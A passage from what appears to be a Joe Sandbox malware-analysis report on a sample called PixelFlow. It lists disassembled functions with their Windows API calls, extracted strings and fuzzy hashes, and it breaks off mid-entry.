Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: df8b0fa9ece280c8925c26e0701123b48efab5338107e2405191e02f10cffb71
Instruction ID: a2404e08a614efe8cf6e79e4bb72e6316eba163aa2d8f32770b6760d0aaf1877
Opcode Fuzzy Hash: df8b0fa9ece280c8925c26e0701123b48efab5338107e2405191e02f10cffb71
Instruction Fuzzy Hash: 23816FB16443119FD710EF14C984AABBBEAFF88324F004A2EF99597291D770D845CFA6

Function 006588AD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00658C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658C1F
Part of subcall function 00658C03: GetLastError.KERNEL32(?,006586E3,?,?,?), ref: 00658C29
Part of subcall function 00658C03: GetProcessHeap.KERNEL32(00000008,?,?,006586E3,?,?,?), ref: 00658C38
Part of subcall function 00658C03: HeapAlloc.KERNEL32(00000000,?,006586E3,?,?,?), ref: 00658C3F
Part of subcall function 00658C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00658C56

Part of subcall function 00658CA0: GetProcessHeap.KERNEL32(00000008,006586F9,00000000,00000000,?,006586F9,?), ref: 00658CAC
Part of subcall function 00658CA0: HeapAlloc.KERNEL32(00000000,?,006586F9,?), ref: 00658CB3
Part of subcall function 00658CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006586F9,?), ref: 00658CC4

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00658911
_memset.LIBCMT ref: 00658926
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00658945
GetLengthSid.ADVAPI32(?), ref: 00658956
GetAce.ADVAPI32(?,00000000,?), ref: 00658993
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006589AF
GetLengthSid.ADVAPI32(?), ref: 006589CC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006589DB
HeapAlloc.KERNEL32(00000000), ref: 006589E2
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00658A03
CopySid.ADVAPI32(00000000), ref: 00658A0A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00658A3B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00658A61
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00658A75

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f9b107bad46c6868dafdd23d1021b87865beda8838d503e13a5529245d4f4ee4
Instruction ID: 04357116a1c362e135b34d1a1fad6b2c256e617b5a6a3dc0c1dae961569ba778
Opcode Fuzzy Hash: f9b107bad46c6868dafdd23d1021b87865beda8838d503e13a5529245d4f4ee4
Instruction Fuzzy Hash: 5B612A7190020AAFDF10DFA5DC45EEEBB7AFF04301F04816AE915A7690DB359A19CF64

Function 006777C9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0067783E
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0067784A
CreateCompatibleDC.GDI32(?), ref: 00677856
SelectObject.GDI32(00000000,?), ref: 00677863
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006778B7
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006778F3
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00677917
SelectObject.GDI32(00000006,?), ref: 0067791F
DeleteObject.GDI32(?), ref: 00677928
DeleteDC.GDI32(00000006), ref: 0067792F
ReleaseDC.USER32(00000000,?), ref: 0067793A

Strings

(, xrefs: 006778BF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6684f500b488f2883795cea0324bd6f30e201e676beaf575e28d3da872fd2d8f
Instruction ID: 6b18b2792d33cea7acfce55f1ea77a881cd7b3cf959a7286657fec20b8814ea0
Opcode Fuzzy Hash: 6684f500b488f2883795cea0324bd6f30e201e676beaf575e28d3da872fd2d8f
Instruction Fuzzy Hash: 9D512B71904209EFDB15CFA8DC89EAEBBBAEF48310F14851EF959A7250D731A941CB50

Function 0066A2FA Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0066A341

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0066A363
__swprintf.LIBCMT ref: 0066A3BC
__swprintf.LIBCMT ref: 0066A3D5
_wprintf.LIBCMT ref: 0066A48B
_wprintf.LIBCMT ref: 0066A4A9

Strings

^ ERROR, xrefs: 0066A42D
Error: , xrefs: 0066A453
"%s" (%d) : ==> %s:%s%s, xrefs: 0066A486
Line %d (File "%s"):, xrefs: 0066A3B6, 0066A3CF
"%s" (%d) : ==> %s:, xrefs: 0066A4A4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: e52335ebf7ee600b8d9ad4c0e81a2e8489906776325453c31b8645bee42b23e1
Instruction ID: d39a51c1cdd5166703006e3c1cb0d76e51a8db465a839786e305dc9ac6926065
Opcode Fuzzy Hash: e52335ebf7ee600b8d9ad4c0e81a2e8489906776325453c31b8645bee42b23e1
Instruction Fuzzy Hash: 4051D171800119AACF54EBE0CD46EEEB77BAF05340F144129F605B21A1EB352F98DF69

Function 0066957D Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00669387: __time64.LIBCMT ref: 00669391

Part of subcall function 00614A8C: _fseek.LIBCMT ref: 00614AA4

__wsplitpath.LIBCMT ref: 0066965C

Part of subcall function 0062424E: __wsplitpath_helper.LIBCMT ref: 0062428E

_wcscpy.LIBCMT ref: 0066966F
_wcscat.LIBCMT ref: 00669682
__wsplitpath.LIBCMT ref: 006696A7
_wcscat.LIBCMT ref: 006696BD
_wcscat.LIBCMT ref: 006696D0

Part of subcall function 006693CD: _memmove.LIBCMT ref: 00669406
Part of subcall function 006693CD: _memmove.LIBCMT ref: 00669415

_wcscmp.LIBCMT ref: 00669617

Part of subcall function 00669B5E: _wcscmp.LIBCMT ref: 00669C4E
Part of subcall function 00669B5E: _wcscmp.LIBCMT ref: 00669C61

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0066987A
_wcsncpy.LIBCMT ref: 006698ED
DeleteFileW.KERNEL32(?,?), ref: 00669923
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00669939
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066994A
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0066995C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 4dfe5ec10329571965a04023f2175eb44c2bfdb9df71bd468e9259cdf622a081
Instruction ID: 90f05ad67ec43b38e5d9318d1fcdd62ccd7d977504365e26f28ef435a0cdd48d
Opcode Fuzzy Hash: 4dfe5ec10329571965a04023f2175eb44c2bfdb9df71bd468e9259cdf622a081
Instruction Fuzzy Hash: 8DC11EB1D0012DAADF61DF95CC85ADEB7BEEF45310F0040AAFA09E7151EB709A848F65

Function 00615BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00615BF1
GetMenuItemCount.USER32(006C6890), ref: 00650DFB
GetMenuItemCount.USER32(006C6890), ref: 00650EAB
GetCursorPos.USER32(?), ref: 00650EEF
SetForegroundWindow.USER32(00000000), ref: 00650EF8
TrackPopupMenuEx.USER32(006C6890,00000000,?,00000000,00000000,00000000), ref: 00650F0B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00650F17

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 00c8d9def9f81a607f4405fb6ab77aed8b5c1eefb4bf760dc77b576d8aebbc8f
Instruction ID: eb7636fe154257b5ee664a2468622920686162faa00015dc3e32dd246a79a233
Opcode Fuzzy Hash: 00c8d9def9f81a607f4405fb6ab77aed8b5c1eefb4bf760dc77b576d8aebbc8f
Instruction Fuzzy Hash: F871E430640606BEFB209F54CC89FEAFF6AFF44764F24421AF925662D1C7B0A854DB94

Function 0066AD57 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00690980), ref: 0066ADBB
GetDriveTypeW.KERNEL32(00000061,006B9970,00000061), ref: 0066AE85
_wcscpy.LIBCMT ref: 0066AEAF

Strings

unknown, xrefs: 0066AE46
network, xrefs: 0066AE19
removable, xrefs: 0066ADED
cdrom, xrefs: 0066ADD7
fixed, xrefs: 0066AE03
L,i, xrefs: 0066AEA7
ramdisk, xrefs: 0066AE2F
all, xrefs: 0066ADC1

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,i$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-3699081978
Opcode ID: 7826d1f9d67f2f80470235e2862b96f63542e4f1b7e3ce4eef25062e98ce656e
Instruction ID: dd1e1ef7a7a0a659797fbf93321874c87ec6c7c9a7bfc1efe03b78b7feb6525d
Opcode Fuzzy Hash: 7826d1f9d67f2f80470235e2862b96f63542e4f1b7e3ce4eef25062e98ce656e
Instruction Fuzzy Hash: E451BFB01083019BC358EF14D892AABB7ABEF81300F54481DF696672E2DB719D49CF93

Function 006581DD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

_memset.LIBCMT ref: 0065826C
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006582A1
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006582BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006582D9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00658303
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0065832B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00658336
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065833B

Strings

\IPC$, xrefs: 00658283
SOFTWARE\Classes\, xrefs: 0065820D
\CLSID, xrefs: 00658223

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: ce014edd9cb1b6fc1bf381c0a2039e3eab5bb060be846be32771b0e9eebc633d
Instruction ID: ac6f7e7820139f85d13eec9b1266fc6b8eda3efba7e8bb2ed6fb58ff574642ec
Opcode Fuzzy Hash: ce014edd9cb1b6fc1bf381c0a2039e3eab5bb060be846be32771b0e9eebc633d
Instruction Fuzzy Hash: D341F472C1022DAFDF11EBA4DC959EDB77ABF04741F04412AE911B7261EE309E45CB94

Function 00681242 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,006801D5,?,?), ref: 00681259

Strings

HKU, xrefs: 0068136B
HKCU, xrefs: 00681349
HKEY_USERS, xrefs: 0068135A
HKEY_CLASSES_ROOT, xrefs: 006812EC
HKCR, xrefs: 00681301
HKEY_LOCAL_MACHINE, xrefs: 006812C2
HKCC, xrefs: 00681327
HKLM, xrefs: 006812D7
HKEY_CURRENT_USER, xrefs: 00681338
HKEY_CURRENT_CONFIG, xrefs: 00681316

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: f1c3c8c8378bbc6f28ca51290dd1c180f1728a70962ea60b70ff59190825e1d5
Instruction ID: f135178dea96cba387bd1af2ccdc51b28aa93a782174ca5da4198dd3075c67bd
Opcode Fuzzy Hash: f1c3c8c8378bbc6f28ca51290dd1c180f1728a70962ea60b70ff59190825e1d5
Instruction Fuzzy Hash: 3741ACB021021A9BDF04EF50E851AEE376BBF52300F404618FC665B686DB709D9ACBA0

Function 006656EF Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Part of subcall function 0061153B: _memmove.LIBCMT ref: 006115C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00665758
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0066576E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066577F
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00665791
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006657A2

Strings

close PlayMe, xrefs: 00665769, 00665796
play PlayMe wait, xrefs: 0066578C
open , xrefs: 00665707
alias PlayMe, xrefs: 00665731
play PlayMe, xrefs: 0066579D
status PlayMe mode, xrefs: 00665753

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 44713d37636c6f65e53d4699fe312bcfd378c2a662853bd6689a950954c799fd
Instruction ID: a4aef07d5e8977c8e8bbc4248586a5412a51c454122b15ffb23ea3a5ac03c542
Opcode Fuzzy Hash: 44713d37636c6f65e53d4699fe312bcfd378c2a662853bd6689a950954c799fd
Instruction Fuzzy Hash: C61194B095012979EB60E761DC5ADFF7B7EEFD2B40F040429B611A61D1EE601D85CAB0

Function 00664A79 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00664A94
gethostname.WSOCK32(?,00000100), ref: 00664AAE
gethostbyname.WSOCK32(?), ref: 00664ABB
_wcscpy.LIBCMT ref: 00664AE3
_memmove.LIBCMT ref: 00664AF6
inet_ntoa.WSOCK32(?), ref: 00664B01
_strcat.LIBCMT ref: 00664B0F
_wcscpy.LIBCMT ref: 00664B26
WSACleanup.WSOCK32 ref: 00664B34
_wcscpy.LIBCMT ref: 00664B42

Strings

0.0.0.0, xrefs: 00664ADD

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 8697811d8bceb83467b0a825c593388652ad6727851a723a11189e99c2b1c02f
Instruction ID: 844e81ddbf1f0faf9b24e06410acb43448263a2a402332b38fcf6d9002097299
Opcode Fuzzy Hash: 8697811d8bceb83467b0a825c593388652ad6727851a723a11189e99c2b1c02f
Instruction Fuzzy Hash: 3A113A32904128BFEBA0ABB0ED4AEDA77BEDF41310F04016AF40597192EF70D9C19B95

Function 0066539D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006653A2

Part of subcall function 0062074E: timeGetTime.WINMM(?,00000002,0060C22C), ref: 00620752

Sleep.KERNEL32(0000000A), ref: 006653CE
EnumThreadWindows.USER32(?,Function_00065350,00000000), ref: 006653F2
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00665414
SetActiveWindow.USER32 ref: 00665433
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00665441
SendMessageW.USER32(00000010,00000000,00000000), ref: 00665460
Sleep.KERNEL32(000000FA), ref: 0066546B
IsWindow.USER32 ref: 00665477
EndDialog.USER32(00000000), ref: 00665488

Strings

BUTTON, xrefs: 00665406

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 53bbd8d7f4313365940099535b0ed325395b6536bd399b3f5798190a913c68b7
Instruction ID: ecb0c4013a70efea709eaa984f0dab4a1cdf8b5bbfcda2ffaa5146a4688771c3
Opcode Fuzzy Hash: 53bbd8d7f4313365940099535b0ed325395b6536bd399b3f5798190a913c68b7
Instruction Fuzzy Hash: 7B21BE71204609AFF7005F60EDCAE363BAFEB84746F503059F413826A1DFA18D508E66

Function 0066DA3D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

CoInitialize.OLE32(00000000), ref: 0066DA9A
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0066DB2D
SHGetDesktopFolder.SHELL32(?), ref: 0066DB41
CoCreateInstance.OLE32(00693D4C,00000000,00000001,006B9BEC,?), ref: 0066DB8D
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0066DBFC
CoTaskMemFree.OLE32(?,?), ref: 0066DC54
_memset.LIBCMT ref: 0066DC91
SHBrowseForFolderW.SHELL32(?), ref: 0066DCCD
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0066DCF0
CoTaskMemFree.OLE32(00000000), ref: 0066DCF7
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0066DD2E
CoUninitialize.OLE32(00000001,00000000), ref: 0066DD30

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 83737c0c2e082f2c293673b5acb3d45071bed19b5d799ce3d1d64478ea08a935
Instruction ID: 889f5a3d1ea9ee64a3b8e4fc3ce0aec044e8ddb9d3db3b78b425d39ba796bab4
Opcode Fuzzy Hash: 83737c0c2e082f2c293673b5acb3d45071bed19b5d799ce3d1d64478ea08a935
Instruction Fuzzy Hash: 85B1FB75A00109AFDB54DFA4C888DAEBBFAFF48314B148499F906EB261DB30ED45CB54

Function 00660687 Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00660702
SetKeyboardState.USER32(?), ref: 0066076D
GetAsyncKeyState.USER32(000000A0), ref: 0066078D
GetKeyState.USER32(000000A0), ref: 006607A4
GetAsyncKeyState.USER32(000000A1), ref: 006607D3
GetKeyState.USER32(000000A1), ref: 006607E4
GetAsyncKeyState.USER32(00000011), ref: 00660810
GetKeyState.USER32(00000011), ref: 0066081E
GetAsyncKeyState.USER32(00000012), ref: 00660847
GetKeyState.USER32(00000012), ref: 00660855
GetAsyncKeyState.USER32(0000005B), ref: 0066087E
GetKeyState.USER32(0000005B), ref: 0066088C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
